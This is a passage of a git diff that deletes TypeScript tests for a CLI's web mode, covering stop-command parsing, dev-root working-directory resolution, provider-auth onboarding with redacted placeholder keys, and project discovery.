-  assert.equal(result.exitCode, 0)
-  assert.equal(stopOptions?.all, true)
-  assert.equal(stopOptions?.projectCwd, undefined)
-})
-
-test('gsd web stop <path> is parsed and dispatched with resolved path', async () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-stop-path-'))
-  let stopOptions: { projectCwd?: string; all?: boolean } | undefined
-
-  try {
-    const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', 'web', 'stop', tmp])
-    const result = await cliWeb.runWebCliBranch(flags, {
-      cwd: () => '/',
-      stopWebMode: (_deps, opts) => {
-        stopOptions = opts
-        return { ok: true, stoppedCount: 1 }
-      },
-      stderr: { write: () => true },
-    })
-
-    assert.equal(result.handled, true)
-    if (!result.handled) throw new Error('expected handled')
-    assert.equal(result.exitCode, 0)
-    assert.equal(stopOptions?.projectCwd, tmp)
-    assert.equal(stopOptions?.all, false)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-// ─── Context-aware launch detection tests ──────────────────────────────
-
-test('resolveContextAwareCwd returns project cwd when inside a project under dev root', () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-ctx-aware-'))
-  const devRoot = join(tmp, 'devroot')
-  const projectA = join(devRoot, 'projectA')
-  const prefsPath = join(tmp, 'web-preferences.json')
-
-  try {
-    mkdirSync(projectA, { recursive: true })
-    writeFileSync(prefsPath, JSON.stringify({ devRoot }))
-
-    const result = cliWeb.resolveContextAwareCwd(projectA, prefsPath)
-    assert.equal(result, projectA)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('resolveContextAwareCwd returns cwd unchanged when AT dev root', () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-ctx-aware-'))
-  const devRoot = join(tmp, 'devroot')
-  const prefsPath = join(tmp, 'web-preferences.json')
-
-  try {
-    mkdirSync(devRoot, { recursive: true })
-    writeFileSync(prefsPath, JSON.stringify({ devRoot }))
-
-    const result = cliWeb.resolveContextAwareCwd(devRoot, prefsPath)
-    assert.equal(result, devRoot)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('resolveContextAwareCwd returns cwd unchanged when no dev root configured', () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-ctx-aware-'))
-  const prefsPath = join(tmp, 'web-preferences.json')
-  const cwd = join(tmp, 'somedir')
-
-  try {
-    mkdirSync(cwd, { recursive: true })
-    writeFileSync(prefsPath, JSON.stringify({ theme: 'dark' }))
-
-    const result = cliWeb.resolveContextAwareCwd(cwd, prefsPath)
-    assert.equal(result, cwd)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('resolveContextAwareCwd returns cwd unchanged when prefs file missing', () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-ctx-aware-'))
-  const prefsPath = join(tmp, 'nonexistent-prefs.json')
-  const cwd = join(tmp, 'somedir')
-
-  try {
-    mkdirSync(cwd, { recursive: true })
-
-    const result = cliWeb.resolveContextAwareCwd(cwd, prefsPath)
-    assert.equal(result, cwd)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('resolveContextAwareCwd returns cwd unchanged when dev root path is stale', () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-ctx-aware-'))
-  const prefsPath = join(tmp, 'web-preferences.json')
-  const cwd = join(tmp, 'somedir')
-  const staleDevRoot = join(tmp, 'nonexistent-devroot')
-
-  try {
-    mkdirSync(cwd, { recursive: true })
-    writeFileSync(prefsPath, JSON.stringify({ devRoot: staleDevRoot }))
-
-    const result = cliWeb.resolveContextAwareCwd(cwd, prefsPath)
-    assert.equal(result, cwd)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('resolveContextAwareCwd resolves nested cwd to one-level-deep project', () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-ctx-aware-'))
-  const devRoot = join(tmp, 'devroot')
-  const projectA = join(devRoot, 'projectA')
-  const nested = join(projectA, 'src', 'components', 'deep')
-  const prefsPath = join(tmp, 'web-preferences.json')
-
-  try {
-    mkdirSync(nested, { recursive: true })
-    writeFileSync(prefsPath, JSON.stringify({ devRoot }))
-
-    const result = cliWeb.resolveContextAwareCwd(nested, prefsPath)
-    assert.equal(result, projectA)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('resolveContextAwareCwd returns cwd unchanged when outside dev root', () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-ctx-aware-'))
-  const devRoot = join(tmp, 'devroot')
-  const outsideDir = join(tmp, 'elsewhere')
-  const prefsPath = join(tmp, 'web-preferences.json')
-
-  try {
-    mkdirSync(devRoot, { recursive: true })
-    mkdirSync(outsideDir, { recursive: true })
-    writeFileSync(prefsPath, JSON.stringify({ devRoot }))
-
-    const result = cliWeb.resolveContextAwareCwd(outsideDir, prefsPath)
-    assert.equal(result, outsideDir)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
diff --git a/src/tests/web-onboarding-contract.test.ts b/src/tests/web-onboarding-contract.test.ts
deleted file mode 100644
index 5d0be31af..000000000
--- a/src/tests/web-onboarding-contract.test.ts
+++ /dev/null
@@ -1,606 +0,0 @@
-import test from "node:test";
-import assert from "node:assert/strict";
-import { EventEmitter } from "node:events";
-import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
-import { tmpdir } from "node:os";
-import { join } from "node:path";
-import { PassThrough } from "node:stream";
-import { StringDecoder } from "node:string_decoder";
-
-const repoRoot = process.cwd();
-const bridge = await import("../web/bridge-service.ts");
-const onboarding = await import("../web/onboarding-service.ts");
-const bootRoute = await import("../../web/app/api/boot/route.ts");
-const onboardingRoute = await import("../../web/app/api/onboarding/route.ts");
-const commandRoute = await import("../../web/app/api/session/command/route.ts");
-const { AuthStorage } = await import("@gsd/pi-coding-agent");
-
-class FakeRpcChild extends EventEmitter {
-  stdin = new PassThrough();
-  stdout = new PassThrough();
-  stderr = new PassThrough();
-  exitCode: number | null = null;
-
-  kill(signal: NodeJS.Signals = "SIGTERM"): boolean {
-    if (this.exitCode === null) {
-      this.exitCode = 0;
-    }
-    queueMicrotask(() => {
-      this.emit("exit", this.exitCode, signal);
-    });
-    return true;
-  }
-}
-
-function serializeJsonLine(value: unknown): string {
-  return `${JSON.stringify(value)}\n`;
-}
-
-function attachJsonLineReader(stream: PassThrough, onLine: (line: string) => void): void {
-  const decoder = new StringDecoder("utf8");
-  let buffer = "";
-
-  stream.on("data", (chunk: string | Buffer) => {
-    buffer += typeof chunk === "string" ? chunk : decoder.write(chunk);
-    while (true) {
-      const newlineIndex = buffer.indexOf("\n");
-      if (newlineIndex === -1) return;
-      const line = buffer.slice(0, newlineIndex);
-      buffer = buffer.slice(newlineIndex + 1);
-      onLine(line.endsWith("\r") ? line.slice(0, -1) : line);
-    }
-  });
-}
-
-function makeWorkspaceFixture(): { projectCwd: string; sessionsDir: string; cleanup: () => void } {
-  const root = mkdtempSync(join(tmpdir(), "gsd-web-onboarding-"));
-  const projectCwd = join(root, "project");
-  const sessionsDir = join(root, "sessions");
-  const milestoneDir = join(projectCwd, ".gsd", "milestones", "M001");
-  const sliceDir = join(milestoneDir, "slices", "S02");
-  const tasksDir = join(sliceDir, "tasks");
-
-  mkdirSync(tasksDir, { recursive: true });
-  mkdirSync(sessionsDir, { recursive: true });
-
-  writeFileSync(
-    join(milestoneDir, "M001-ROADMAP.md"),
-    `# M001: Demo Milestone\n\n## Slices\n- [ ] **S02: First-run setup wizard** \`risk:medium\` \`depends:[S01]\`\n  > Browser onboarding\n`,
-  );
-  writeFileSync(
-    join(sliceDir, "S02-PLAN.md"),
-    `# S02: First-run setup wizard\n\n**Goal:** Demo\n**Demo:** Demo\n\n## Tasks\n- [ ] **T01: Establish shared onboarding auth truth and browser setup API** \`est:1h\`\n  Do the work.\n`,
-  );
-  writeFileSync(
-    join(tasksDir, "T01-PLAN.md"),
-    `# T01: Establish shared onboarding auth truth and browser setup API\n\n## Steps\n- do it\n`,
-  );
-
-  return {
-    projectCwd,
-    sessionsDir,
-    cleanup: () => rmSync(root, { recursive: true, force: true }),
-  };
-}
-
-function createSessionFile(projectCwd: string, sessionsDir: string, sessionId: string, name: string): string {
-  const sessionPath = join(sessionsDir, `2026-03-14T18-00-00-000Z_${sessionId}.jsonl`);
-  writeFileSync(
-    sessionPath,
-    [
-      JSON.stringify({
-        type: "session",
-        version: 3,
-        id: sessionId,
-        timestamp: "2026-03-14T18:00:00.000Z",
-        cwd: projectCwd,
-      }),
-      JSON.stringify({
-        type: "session_info",
-        id: "info-1",
-        parentId: null,
-        timestamp: "2026-03-14T18:00:01.000Z",
-        name,
-      }),
-    ].join("\n") + "\n",
-  );
-  return sessionPath;
-}
-
-function fakeAutoDashboardData() {
-  return {
-    active: false,
-    paused: false,
-    stepMode: false,
-    startTime: 0,
-    elapsed: 0,
-    currentUnit: null,
-    completedUnits: [],
-    basePath: "",
-    totalCost: 0,
-    totalTokens: 0,
-  };
-}
-
-function fakeWorkspaceIndex() {
-  return {
-    milestones: [
-      {
-        id: "M001",
-        title: "Demo Milestone",
-        roadmapPath: ".gsd/milestones/M001/M001-ROADMAP.md",
-        slices: [
-          {
-            id: "S02",
-            title: "First-run setup wizard",
-            done: false,
-            planPath: ".gsd/milestones/M001/slices/S02/S02-PLAN.md",
-            tasksDir: ".gsd/milestones/M001/slices/S02/tasks",
-            tasks: [
-              {
-                id: "T01",
-                title: "Establish shared onboarding auth truth and browser setup API",
-                done: false,
-                planPath: ".gsd/milestones/M001/slices/S02/tasks/T01-PLAN.md",
-              },
-            ],
-          },
-        ],
-      },
-    ],
-    active: {
-      milestoneId: "M001",
-      sliceId: "S02",
-      taskId: "T01",
-      phase: "executing",
-    },
-    scopes: [
-      { scope: "project", label: "project", kind: "project" },
-      { scope: "M001", label: "M001: Demo Milestone", kind: "milestone" },
-      { scope: "M001/S02", label: "M001/S02: First-run setup wizard", kind: "slice" },
-      {
-        scope: "M001/S02/T01",
-        label: "M001/S02/T01: Establish shared onboarding auth truth and browser setup API",
-        kind: "task",
-      },
-    ],
-    validationIssues: [],
-  };
-}
-
-function createHarness(onCommand: (command: any, harness: ReturnType<typeof createHarness>) => void) {
-  let spawnCalls = 0;
-  let child: FakeRpcChild | null = null;
-
-  const harness = {
-    spawn(command: string, args: readonly string[], options: Record<string, unknown>) {
-      spawnCalls += 1;
-      child = new FakeRpcChild();
-      attachJsonLineReader(child.stdin, (line) => {
-        onCommand(JSON.parse(line), harness);
-      });
-      void command;
-      void args;
-      void options;
-      return child as any;
-    },
-    emit(payload: unknown) {
-      if (!child) throw new Error("fake child not started");
-      child.stdout.write(serializeJsonLine(payload));
-    },
-    get spawnCalls() {
-      return spawnCalls;
-    },
-  };
-
-  return harness;
-}
-
-function configureBridgeFixture(fixture: { projectCwd: string; sessionsDir: string }, sessionId: string) {
-  const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, sessionId, "Onboarding Session");
-  const harness = createHarness((command, current) => {
-    if (command.type === "get_state") {
-      current.emit({
-        id: command.id,
-        type: "response",
-        command: "get_state",
-        success: true,
-        data: {
-          sessionId,
-          sessionFile: sessionPath,
-          thinkingLevel: "off",
-          isStreaming: false,
-          isCompacting: false,
-          steeringMode: "all",
-          followUpMode: "all",
-          autoCompactionEnabled: false,
-          autoRetryEnabled: false,
-          retryInProgress: false,
-          retryAttempt: 0,
-          messageCount: 0,
-          pendingMessageCount: 0,
-        },
-      });
-      return;
-    }
-
-    assert.fail(`unexpected bridge command during onboarding contract test: ${command.type}`);
-  });
-
-  bridge.configureBridgeServiceForTests({
-    env: {
-      ...process.env,
-      GSD_WEB_PROJECT_CWD: fixture.projectCwd,
-      GSD_WEB_PROJECT_SESSIONS_DIR: fixture.sessionsDir,
-      GSD_WEB_PACKAGE_ROOT: repoRoot,
-    },
-    spawn: harness.spawn,
-    indexWorkspace: async () => fakeWorkspaceIndex(),
-    getAutoDashboardData: () => fakeAutoDashboardData(),
-  });
-
-  return harness;
-}
-
-test("boot and onboarding routes expose locked required state plus explicitly skippable optional setup when auth is missing", async () => {
-  const fixture = makeWorkspaceFixture();
-  const authStorage = AuthStorage.inMemory({});
-  configureBridgeFixture(fixture, "sess-missing-auth");
-  onboarding.configureOnboardingServiceForTests({ authStorage });
-
-  try {
-    const bootResponse = await bootRoute.GET();
-    assert.equal(bootResponse.status, 200);
-    const bootPayload = (await bootResponse.json()) as any;
-
-    assert.equal(bootPayload.onboardingNeeded, true);
-    assert.equal(bootPayload.onboarding.status, "blocked");
-    assert.equal(bootPayload.onboarding.locked, true);
-    assert.equal(bootPayload.onboarding.lockReason, "required_setup");
-    assert.equal(bootPayload.onboarding.bridgeAuthRefresh.phase, "idle");
-    assert.equal(bootPayload.onboarding.required.satisfied, false);
-    assert.equal(bootPayload.onboarding.required.satisfiedBy, null);
-    assert.equal(bootPayload.onboarding.optional.skippable, true);
-    assert.ok(bootPayload.onboarding.optional.sections.every((section: any) => section.blocking === false));
-
-    const providerIds = bootPayload.onboarding.required.providers.map((provider: any) => provider.id);
-    assert.deepEqual(providerIds, [
-      "anthropic",
-      "openai",
-      "github-copilot",
-      "openai-codex",
-      "google-gemini-cli",
-      "google-antigravity",
-      "google",
-      "groq",
-      "xai",
-      "openrouter",
-      "mistral",
-    ]);
-    const anthropicProvider = bootPayload.onboarding.required.providers.find((provider: any) => provider.id === "anthropic");
-    assert.equal(anthropicProvider.supports.apiKey, true);
-    assert.equal(anthropicProvider.supports.oauthAvailable, true);
-
-    const onboardingResponse = await onboardingRoute.GET();
-    assert.equal(onboardingResponse.status, 200);
-    const onboardingPayload = (await onboardingResponse.json()) as any;
-    assert.equal(onboardingPayload.onboarding.locked, true);
-    assert.equal(onboardingPayload.onboarding.optional.skippable, true);
-  } finally {
-    onboarding.resetOnboardingServiceForTests();
-    await bridge.resetBridgeServiceForTests();
-    fixture.cleanup();
-  }
-});
-
-test("runtime env-backed auth unlocks boot onboarding state and reports the environment source", async () => {
-  const fixture = makeWorkspaceFixture();
-  const authStorage = AuthStorage.inMemory({});
-  const previousGithubToken = process.env.GITHUB_TOKEN;
-  process.env.GITHUB_TOKEN = "ghu_runtime_env_token";
-  configureBridgeFixture(fixture, "sess-env-auth");
-  onboarding.configureOnboardingServiceForTests({ authStorage });
-
-  try {
-    const bootResponse = await bootRoute.GET();
-    assert.equal(bootResponse.status, 200);
-    const bootPayload = (await bootResponse.json()) as any;
-
-    assert.equal(bootPayload.onboardingNeeded, false);
-    assert.equal(bootPayload.onboarding.locked, false);
-    assert.equal(bootPayload.onboarding.lockReason, null);
-    assert.equal(bootPayload.onboarding.bridgeAuthRefresh.phase, "idle");
-    assert.deepEqual(bootPayload.onboarding.required.satisfiedBy, {
-      providerId: "github-copilot",
-      source: "environment",
-    });
-    const copilotProvider = bootPayload.onboarding.required.providers.find((provider: any) => provider.id === "github-copilot");
-    assert.equal(copilotProvider.configured, true);
-    assert.equal(copilotProvider.configuredVia, "environment");
-  } finally {
-    if (previousGithubToken === undefined) {
-      delete process.env.GITHUB_TOKEN;
-    } else {
-      process.env.GITHUB_TOKEN = previousGithubToken;
-    }
-    onboarding.resetOnboardingServiceForTests();
-    await bridge.resetBridgeServiceForTests();
-    fixture.cleanup();
-  }
-});
-
-test("failed API-key validation stays locked, redacts the error, and is reflected in boot state without persisting auth", async () => {
-  const fixture = makeWorkspaceFixture();
-  const authStorage = AuthStorage.inMemory({});
-  configureBridgeFixture(fixture, "sess-validation-failure");
-  onboarding.configureOnboardingServiceForTests({
-    authStorage,
-    validateApiKey: async () => ({
-      ok: false,
-      message: "OpenAI rejected sk-test-secret-123456 because Bearer sk-test-secret-123456 is invalid",
-    }),
-  });
-
-  try {
-    const validationResponse = await onboardingRoute.POST(
-      new Request("http://localhost/api/onboarding", {
-        method: "POST",
-        body: JSON.stringify({
-          action: "save_api_key",
-          providerId: "openai",
-          apiKey: "sk-test-secret-123456",
-        }),
-      }),
-    );
-
-    assert.equal(validationResponse.status, 422);
-    const validationPayload = (await validationResponse.json()) as any;
-    assert.equal(validationPayload.onboarding.locked, true);
-    assert.equal(validationPayload.onboarding.required.satisfied, false);
-    assert.equal(validationPayload.onboarding.lastValidation.status, "failed");
-    assert.equal(validationPayload.onboarding.lastValidation.providerId, "openai");
-    assert.equal(validationPayload.onboarding.lastValidation.persisted, false);
-    assert.equal(validationPayload.onboarding.lockReason, "required_setup");
-    assert.equal(validationPayload.onboarding.bridgeAuthRefresh.phase, "idle");
-    assert.match(validationPayload.onboarding.lastValidation.message, /OpenAI rejected/i);
-    assert.doesNotMatch(validationPayload.onboarding.lastValidation.message, /sk-test-secret-123456/);
-    assert.equal(authStorage.hasAuth("openai"), false);
-
-    const bootResponse = await bootRoute.GET();
-    assert.equal(bootResponse.status, 200);
-    const bootPayload = (await bootResponse.json()) as any;
-    assert.equal(bootPayload.onboarding.locked, true);
-    assert.equal(bootPayload.onboarding.lastValidation.status, "failed");
-    assert.doesNotMatch(bootPayload.onboarding.lastValidation.message, /sk-test-secret-123456/);
-  } finally {
-    onboarding.resetOnboardingServiceForTests();
-    await bridge.resetBridgeServiceForTests();
-    fixture.cleanup();
-  }
-});
-
-test("direct prompt commands cannot bypass onboarding while required setup is still locked", async () => {
-  const fixture = makeWorkspaceFixture();
-  const authStorage = AuthStorage.inMemory({});
-  const harness = configureBridgeFixture(fixture, "sess-command-locked");
-  onboarding.configureOnboardingServiceForTests({ authStorage });
-
-  try {
-    const response = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "prompt", message: "hello from bypass attempt" }),
-      }),
-    );
-
-    assert.equal(response.status, 423);
-    const payload = (await response.json()) as any;
-    assert.equal(payload.success, false);
-    assert.equal(payload.command, "prompt");
-    assert.equal(payload.code, "onboarding_locked");
-    assert.equal(payload.details.reason, "required_setup");
-    assert.equal(payload.details.onboarding.locked, true);
-    assert.equal(harness.spawnCalls, 0);
-
-    const stateResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "get_state" }),
-      }),
-    );
-    assert.equal(stateResponse.status, 200);
-    const statePayload = (await stateResponse.json()) as any;
-    assert.equal(statePayload.success, true);
-    assert.equal(statePayload.command, "get_state");
-    assert.equal(harness.spawnCalls, 1);
-  } finally {
-    onboarding.resetOnboardingServiceForTests();
-    await bridge.resetBridgeServiceForTests();
-    fixture.cleanup();
-  }
-});
-
-test("bridge auth refresh failures remain inspectable and keep the workspace locked after credentials validate", async () => {
-  const fixture = makeWorkspaceFixture();
-  const authStorage = AuthStorage.inMemory({});
-  configureBridgeFixture(fixture, "sess-refresh-failure");
-  onboarding.configureOnboardingServiceForTests({
-    authStorage,
-    validateApiKey: async () => ({ ok: true, message: "openai credentials validated" }),
-    refreshBridgeAuth: async () => {
-      throw new Error("bridge restart failed for sk-refresh-secret-123456");
-    },
-  });
-
-  try {
-    const validationResponse = await onboardingRoute.POST(
-      new Request("http://localhost/api/onboarding", {
-        method: "POST",
-        body: JSON.stringify({
-          action: "save_api_key",
-          providerId: "openai",
-          apiKey: "sk-valid-123456",
-        }),
-      }),
-    );
-
-    assert.equal(validationResponse.status, 503);
-    const validationPayload = (await validationResponse.json()) as any;
-    assert.equal(validationPayload.onboarding.required.satisfied, true);
-    assert.equal(validationPayload.onboarding.locked, true);
-    assert.equal(validationPayload.onboarding.lockReason, "bridge_refresh_failed");
-    assert.equal(validationPayload.onboarding.lastValidation.status, "succeeded");
-    assert.equal(validationPayload.onboarding.bridgeAuthRefresh.phase, "failed");
-    assert.match(validationPayload.onboarding.bridgeAuthRefresh.error, /bridge restart failed/i);
-    assert.doesNotMatch(validationPayload.onboarding.bridgeAuthRefresh.error, /sk-refresh-secret-123456/);
-    assert.equal(authStorage.hasAuth("openai"), true);
-
-    const bootResponse = await bootRoute.GET();
-    const bootPayload = (await bootResponse.json()) as any;
-    assert.equal(bootPayload.onboarding.locked, true);
-    assert.equal(bootPayload.onboarding.lockReason, "bridge_refresh_failed");
-    assert.equal(bootPayload.onboarding.bridgeAuthRefresh.phase, "failed");
-  } finally {
-    onboarding.resetOnboardingServiceForTests();
-    await bridge.resetBridgeServiceForTests();
-    fixture.cleanup();
-  }
-});
-
-test("successful API-key validation persists the credential and unlocks onboarding", async () => {
-  const fixture = makeWorkspaceFixture();
-  const authStorage = AuthStorage.inMemory({});
-  const harness = configureBridgeFixture(fixture, "sess-validation-success");
-  onboarding.configureOnboardingServiceForTests({
-    authStorage,
-    validateApiKey: async () => ({ ok: true, message: "openai credentials validated" }),
-  });
-
-  try {
-    const validationResponse = await onboardingRoute.POST(
-      new Request("http://localhost/api/onboarding", {
-        method: "POST",
-        body: JSON.stringify({
-          action: "save_api_key",
-          providerId: "openai",
-          apiKey: "sk-valid-123456",
-        }),
-      }),
-    );
-
-    assert.equal(validationResponse.status, 200);
-    const validationPayload = (await validationResponse.json()) as any;
-    assert.equal(validationPayload.onboarding.locked, false);
-    assert.deepEqual(validationPayload.onboarding.required.satisfiedBy, {
-      providerId: "openai",
-      source: "auth_file",
-    });
-    assert.equal(validationPayload.onboarding.lastValidation.status, "succeeded");
-    assert.equal(validationPayload.onboarding.lastValidation.persisted, true);
-    assert.equal(validationPayload.onboarding.lockReason, null);
-    assert.equal(validationPayload.onboarding.bridgeAuthRefresh.phase, "succeeded");
-    assert.equal(authStorage.hasAuth("openai"), true);
-    assert.equal(harness.spawnCalls, 1);
-
-    const bootResponse = await bootRoute.GET();
-    const bootPayload = (await bootResponse.json()) as any;
-    assert.equal(bootPayload.onboarding.locked, false);
-    assert.equal(bootPayload.onboarding.lockReason, null);
-    assert.equal(bootPayload.onboarding.bridgeAuthRefresh.phase, "succeeded");
-    assert.equal(bootPayload.onboardingNeeded, false);
-  } finally {
-    onboarding.resetOnboardingServiceForTests();
-    await bridge.resetBridgeServiceForTests();
-    fixture.cleanup();
-  }
-});
-
-test("logout_provider removes saved auth, refreshes the bridge, and relocks onboarding when it was the only provider", async () => {
-  const fixture = makeWorkspaceFixture();
-  const authStorage = AuthStorage.inMemory({
-    openai: { type: "api_key", key: "sk-saved-logout" },
-  } as any);
-  const harness = configureBridgeFixture(fixture, "sess-logout-success");
-  onboarding.configureOnboardingServiceForTests({ authStorage });
-
-  try {
-    const bootBefore = await bootRoute.GET();
-    const bootBeforePayload = (await bootBefore.json()) as any;
-    assert.equal(bootBeforePayload.onboarding.locked, false);
-    assert.equal(bootBeforePayload.onboarding.required.satisfiedBy.providerId, "openai");
-    assert.equal(harness.spawnCalls, 1);
-
-    const logoutResponse = await onboardingRoute.POST(
-      new Request("http://localhost/api/onboarding", {
-        method: "POST",
-        body: JSON.stringify({
-          action: "logout_provider",
-          providerId: "openai",
-        }),
-      }),
-    );
-
-    assert.equal(logoutResponse.status, 200);
-    const logoutPayload = (await logoutResponse.json()) as any;
-    assert.equal(logoutPayload.onboarding.locked, true);
-    assert.equal(logoutPayload.onboarding.lockReason, "required_setup");
-    assert.equal(logoutPayload.onboarding.bridgeAuthRefresh.phase, "succeeded");
-    assert.equal(logoutPayload.onboarding.lastValidation, null);
-    assert.equal(authStorage.hasAuth("openai"), false);
-    assert.equal(harness.spawnCalls, 2);
-
-    const bootAfter = await bootRoute.GET();
-    const bootAfterPayload = (await bootAfter.json()) as any;
-    assert.equal(bootAfterPayload.onboarding.locked, true);
-    assert.equal(bootAfterPayload.onboarding.lockReason, "required_setup");
-    assert.equal(bootAfterPayload.onboarding.bridgeAuthRefresh.phase, "succeeded");
-    assert.equal(bootAfterPayload.onboarding.required.satisfied, false);
-  } finally {
-    onboarding.resetOnboardingServiceForTests();
-    await bridge.resetBridgeServiceForTests();
-    fixture.cleanup();
-  }
-});
-
-test("logout_provider fails clearly for environment-backed auth that the browser cannot remove", async () => {
-  const fixture = makeWorkspaceFixture();
-  const authStorage = AuthStorage.inMemory({});
-  const previousGithubToken = process.env.GITHUB_TOKEN;
-  process.env.GITHUB_TOKEN = "ghu_env_only_token";
-  configureBridgeFixture(fixture, "sess-logout-env");
-  onboarding.configureOnboardingServiceForTests({ authStorage });
-
-  try {
-    const bootBefore = await bootRoute.GET();
-    const bootBeforePayload = (await bootBefore.json()) as any;
-    assert.equal(bootBeforePayload.onboarding.locked, false);
-    assert.equal(bootBeforePayload.onboarding.required.satisfiedBy.providerId, "github-copilot");
-    assert.equal(bootBeforePayload.onboarding.required.satisfiedBy.source, "environment");
-
-    const logoutResponse = await onboardingRoute.POST(
-      new Request("http://localhost/api/onboarding", {
-        method: "POST",
-        body: JSON.stringify({
-          action: "logout_provider",
-          providerId: "github-copilot",
-        }),
-      }),
-    );
-
-    assert.equal(logoutResponse.status, 400);
-    const logoutPayload = (await logoutResponse.json()) as any;
-    assert.match(logoutPayload.error, /cannot be logged out from the browser surface/i);
-    assert.equal(logoutPayload.onboarding.locked, false);
-    assert.equal(logoutPayload.onboarding.required.satisfiedBy.providerId, "github-copilot");
-    assert.equal(logoutPayload.onboarding.required.satisfiedBy.source, "environment");
-  } finally {
-    if (previousGithubToken === undefined) {
-      delete process.env.GITHUB_TOKEN;
-    } else {
-      process.env.GITHUB_TOKEN = previousGithubToken;
-    }
-    onboarding.resetOnboardingServiceForTests();
-    await bridge.resetBridgeServiceForTests();
-    fixture.cleanup();
-  }
-});
diff --git a/src/tests/web-project-discovery-contract.test.ts b/src/tests/web-project-discovery-contract.test.ts
deleted file mode 100644
index 351a75426..000000000
--- a/src/tests/web-project-discovery-contract.test.ts
+++ /dev/null
@@ -1,124 +0,0 @@
-import test, { after, describe } from "node:test";
-import assert from "node:assert/strict";
-import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
-import { tmpdir } from "node:os";
-import { join } from "node:path";
-
-import { discoverProjects } from "../web/project-discovery-service.ts";
-
-// ---------------------------------------------------------------------------
-// Fixture setup
-// ---------------------------------------------------------------------------
-
-const tempRoot = mkdtempSync(join(tmpdir(), "gsd-project-discovery-"));
-
-// project-a: brownfield (package.json + .git)
-const projectA = join(tempRoot, "project-a");
-mkdirSync(projectA);
-mkdirSync(join(projectA, ".git"));
-writeFileSync(join(projectA, "package.json"), "{}");
-
-// project-b: empty-gsd (.gsd folder, no milestones)
-const projectB = join(tempRoot, "project-b");
-mkdirSync(projectB);
-mkdirSync(join(projectB, ".gsd"));
-
-// project-c: brownfield (Cargo.toml)
-const projectC = join(tempRoot, "project-c");
-mkdirSync(projectC);
-writeFileSync(join(projectC, "Cargo.toml"), "");
-
-// project-d: blank (empty)
-const projectD = join(tempRoot, "project-d");
-mkdirSync(projectD);
-
-// .hidden: should be excluded
-mkdirSync(join(tempRoot, ".hidden"));
-
-// node_modules: should be excluded
-mkdirSync(join(tempRoot, "node_modules"));
-
-// ---------------------------------------------------------------------------
-// Teardown
-// ---------------------------------------------------------------------------
-
-after(() => {
-  rmSync(tempRoot, { recursive: true, force: true });
-});
-
-// ---------------------------------------------------------------------------
-// Tests
-// ---------------------------------------------------------------------------
-
-describe("project-discovery", () => {
-  test("discovers exactly 4 project directories (excludes hidden + node_modules)", () => {
-    const results = discoverProjects(tempRoot);
-    assert.equal(results.length, 4, `Expected 4 projects, got ${results.length}: ${results.map(r => r.name).join(", ")}`);
-  });
-
-  test("results are sorted alphabetically by name", () => {
-    const results = discoverProjects(tempRoot);
-    const names = results.map(r => r.name);
-    assert.deepStrictEqual(names, ["project-a", "project-b", "project-c", "project-d"]);
-  });
-
-  test("project-a is detected as brownfield with correct signals", () => {
-    const results = discoverProjects(tempRoot);
-    const a = results.find(r => r.name === "project-a");
-    assert.ok(a, "project-a not found");
-    assert.equal(a.kind, "brownfield");
-    assert.equal(a.signals.hasPackageJson, true);
-    assert.equal(a.signals.hasGitRepo, true);
-  });
-
-  test("project-b is detected as empty-gsd", () => {
-    const results = discoverProjects(tempRoot);
-    const b = results.find(r => r.name === "project-b");
-    assert.ok(b, "project-b not found");
-    assert.equal(b.kind, "empty-gsd");
-    assert.equal(b.signals.hasGsdFolder, true);
-  });
-
-  test("project-c is detected as brownfield with hasCargo signal", () => {
-    const results = discoverProjects(tempRoot);
-    const c = results.find(r => r.name === "project-c");
-    assert.ok(c, "project-c not found");
-    assert.equal(c.kind, "brownfield");
-    assert.equal(c.signals.hasCargo, true);
-  });
-
-  test("project-d is detected as blank", () => {
-    const results = discoverProjects(tempRoot);
-    const d = results.find(r => r.name === "project-d");
-    assert.ok(d, "project-d not found");
-    assert.equal(d.kind, "blank");
-  });
-
-  test("excludes .hidden and node_modules directories", () => {
-    const results = discoverProjects(tempRoot);
-    const names = results.map(r => r.name);
-    assert.ok(!names.includes(".hidden"), ".hidden should be excluded");
-    assert.ok(!names.includes("node_modules"), "node_modules should be excluded");
-  });
-
-  test("all entries have lastModified as a number > 0", () => {
-    const results = discoverProjects(tempRoot);
-    for (const entry of results) {
-      assert.equal(typeof entry.lastModified, "number");
-      assert.ok(entry.lastModified > 0, `${entry.name} lastModified should be > 0`);
-    }
-  });
-
-  test("all entries have valid path and name", () => {
-    const results = discoverProjects(tempRoot);
-    for (const entry of results) {
-      assert.ok(entry.path.startsWith(tempRoot), `${entry.name} path should start with tempRoot`);
-      assert.ok(entry.name.length > 0, "name should not be empty");
-    }
-  });
-
-  test("nonexistent path returns empty array", () => {
-    const results = discoverProjects("/nonexistent/path/that/does/not/exist");
-    assert.deepStrictEqual(results, []);
-  });
-});
diff --git a/src/tests/web-subprocess-runner.test.ts b/src/tests/web-subprocess-runner.test.ts
new file mode 100644
index 000000000..ab3004619
--- /dev/null
+++ b/src/tests/web-subprocess-runner.test.ts
